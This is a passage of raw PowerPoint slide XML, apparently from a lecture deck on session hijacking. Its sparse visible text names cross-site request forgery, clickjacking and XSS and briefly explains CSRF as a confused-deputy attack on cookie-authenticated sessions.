                    <a:pt x="10385554" y="1192548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10343001" y="1207762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10296652" y="1213103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202183" y="1213103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155834" y="1207762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113281" y="1192548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75740" y="1168676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44427" y="1137363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20555" y="1099822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5341" y="1057269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1010920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="202184"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9525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6048502" y="3724783"/>
            <a:ext cx="54635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Cross-Site</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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Request</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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Forgery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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>(CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>XSRF)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526345" y="5015293"/>
            <a:ext cx="10508615" cy="1221105"/>
            <a:chOff x="3526345" y="5015293"/>
            <a:chExt cx="10508615" cy="1221105"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3531108" y="5020055"/>
              <a:ext cx="10499090" cy="1211580"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="10499090" h="1211579">
                  <a:moveTo>
                    <a:pt x="10296906" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="201929" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155634" y="5334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113133" y="20527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75640" y="44367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44367" y="75640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20527" y="113133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5334" y="155634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="201930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1009650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5333" y="1055945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20527" y="1098446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44367" y="1135939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75640" y="1167212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113133" y="1191052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155634" y="1206246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201929" y="1211580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10296906" y="1211580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10343201" y="1206246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10385702" y="1191052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10423195" y="1167212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10454468" y="1135939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10478308" y="1098446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10493502" y="1055945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10498836" y="1009650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10498836" y="201930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10493502" y="155634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10478308" y="113133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10454468" y="75640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10423195" y="44367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10385702" y="20527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10343201" y="5334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10296906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531108" y="5020055"/>
              <a:ext cx="10499090" cy="1211580"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="10499090" h="1211579">
                  <a:moveTo>
                    <a:pt x="0" y="201930"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5334" y="155634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20527" y="113133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44367" y="75640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75640" y="44367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113133" y="20527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155634" y="5334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201929" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10296906" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10343201" y="5334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10385702" y="20527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10423195" y="44367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10454468" y="75640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10478308" y="113133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10493502" y="155634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10498836" y="201930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10498836" y="1009650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10493502" y="1055945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10478308" y="1098446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10454468" y="1135939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10423195" y="1167212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10385702" y="1191052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10343201" y="1206246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10296906" y="1211580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201929" y="1211580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155634" y="1206246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113133" y="1191052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75640" y="1167212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44367" y="1135939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20527" y="1098446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5333" y="1055945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1009650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="201930"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9525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7976361" y="5430773"/>
            <a:ext cx="160972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5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2200" spc="-7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90">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ic</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-135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dirty="0" sz="2200" spc="-570">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-85">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>jacking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480625" y="6720649"/>
            <a:ext cx="10508615" cy="1221105"/>
            <a:chOff x="3480625" y="6720649"/>
            <a:chExt cx="10508615" cy="1221105"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="object 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3485388" y="6725411"/>
              <a:ext cx="10499090" cy="1211580"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="10499090" h="1211579">
                  <a:moveTo>
                    <a:pt x="10296906" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="201929" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155634" y="5334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113133" y="20527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75640" y="44367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44367" y="75640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20527" y="113133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5334" y="155634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="201930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1009650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5333" y="1055945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20527" y="1098446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44367" y="1135939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75640" y="1167212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113133" y="1191052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155634" y="1206246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201929" y="1211580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10296906" y="1211580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10343201" y="1206246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10385702" y="1191052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10423195" y="1167212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10454468" y="1135939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10478308" y="1098446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10493501" y="1055945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10498835" y="1009650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10498835" y="201930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10493501" y="155634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10478308" y="113133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10454468" y="75640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10423195" y="44367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10385702" y="20527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10343201" y="5334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10296906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485388" y="6725411"/>
              <a:ext cx="10499090" cy="1211580"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="10499090" h="1211579">
                  <a:moveTo>
                    <a:pt x="0" y="201930"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5334" y="155634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20527" y="113133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44367" y="75640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75640" y="44367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113133" y="20527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155634" y="5334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201929" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10296906" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10343201" y="5334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10385702" y="20527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10423195" y="44367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10454468" y="75640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10478308" y="113133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10493501" y="155634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10498835" y="201930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10498835" y="1009650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10493501" y="1055945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10478308" y="1098446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10454468" y="1135939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10423195" y="1167212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10385702" y="1191052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10343201" y="1206246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10296906" y="1211580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201929" y="1211580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155634" y="1206246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113133" y="1191052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75640" y="1167212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44367" y="1135939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20527" y="1098446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5333" y="1055945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1009650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="201930"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9524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8156193" y="7136079"/>
            <a:ext cx="11582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0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>SS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1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3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3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60">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ip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95521" y="306451"/>
            <a:ext cx="866330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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Session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50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Hijacking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5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30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Cross-Site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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Request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25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Forgery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30501" y="1882292"/>
            <a:ext cx="13194030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121785" marR="5080" indent="-4109720">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Client-Side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Cross-Site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Request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Forgery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(CSRF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XSRF)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exploit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applications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use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cookies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to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authentica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ac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k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ession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1407" y="760476"/>
            <a:ext cx="12202668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4828032" y="3770376"/>
            <a:ext cx="8676640" cy="1213485"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8676640" h="1213485">
                <a:moveTo>
                  <a:pt x="8473948" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="202183" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155834" y="5341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113281" y="20555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75740" y="44427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44427" y="75740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20555" y="113281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5341" y="155834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="202184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1010920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5341" y="1057269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20555" y="1099822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44427" y="1137363"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75740" y="1168676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113281" y="1192548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155834" y="1207762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202183" y="1213103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8473948" y="1213103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8520297" y="1207762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8562850" y="1192548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8600391" y="1168676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8631704" y="1137363"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8655576" y="1099822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8670790" y="1057269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8676131" y="1010920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8676131" y="202184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8670790" y="155834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8655576" y="113281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8631704" y="75740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8600391" y="44427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8562850" y="20555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8520297" y="5341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8473948" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="F8DE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131689" y="3943248"/>
            <a:ext cx="8067040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73630" marR="5080" indent="-2361565">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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CSRF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XSRF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passes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URL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4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another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site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where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user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has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dirty="0" sz="2200" spc="-13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authenticated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session.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28032" y="5477255"/>
            <a:ext cx="8676640" cy="1211580"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8676640" h="1211579">
                <a:moveTo>
                  <a:pt x="8474202" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="201929" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155634" y="5334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113133" y="20527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75640" y="44367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44367" y="75640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20527" y="113133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5334" y="155634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="201930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1009650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5333" y="1055945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20527" y="1098446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44367" y="1135939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75640" y="1167212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113133" y="1191052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155634" y="1206246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="201929" y="1211580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8474202" y="1211580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8520497" y="1206246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8562998" y="1191052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8600491" y="1167212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8631764" y="1135939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8655604" y="1098446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8670797" y="1055945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8676131" y="1009650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8676131" y="201930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8670797" y="155634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8655604" y="113133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8631764" y="75640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8600491" y="44367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8562998" y="20527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8520497" y="5334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8474202" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="F8DE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436489" y="5887973"/>
            <a:ext cx="745998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F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XSR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F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als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ex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cute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by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confu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deputy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ck.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70860" y="3563111"/>
            <a:ext cx="1629156" cy="162915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12592" y="5387340"/>
            <a:ext cx="1397508" cy="139141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95776" y="306451"/>
            <a:ext cx="866330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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Session </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Hijacking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5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35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Cross-Site</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-5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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-5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25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Forgery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9072" y="760476"/>
            <a:ext cx="12888468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872232" y="1572209"/>
            <a:ext cx="109162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image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below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shows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example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how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cross-site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request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forgery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takes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place.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10283" y="2595372"/>
            <a:ext cx="13435965" cy="5716905"/>
            <a:chOff x="1510283" y="2595372"/>
            <a:chExt cx="13435965" cy="5716905"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1510283" y="2595372"/>
              <a:ext cx="13435965" cy="5716905"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="13435965" h="5716905">
                  <a:moveTo>
                    <a:pt x="13125450" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="310134" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="264295" y="3361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220548" y="13127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179371" y="28818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141244" y="49954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106646" y="76056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76056" y="106646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49954" y="141244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28818" y="179371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13127" y="220548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3361" y="264295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="310133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5406402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3361" y="5452229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13127" y="5495968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28818" y="5537140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49954" y="5575265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76056" y="5609863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106646" y="5640455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141244" y="5666560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179371" y="5687700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220548" y="5703393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="264295" y="5713161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310134" y="5716524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13125450" y="5716524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13171288" y="5713161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13215035" y="5703393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13256212" y="5687700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13294339" y="5666560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13328937" y="5640455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13359527" y="5609863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13385629" y="5575265"/>
                  </a:lnTo>
                  <a:lnTo>
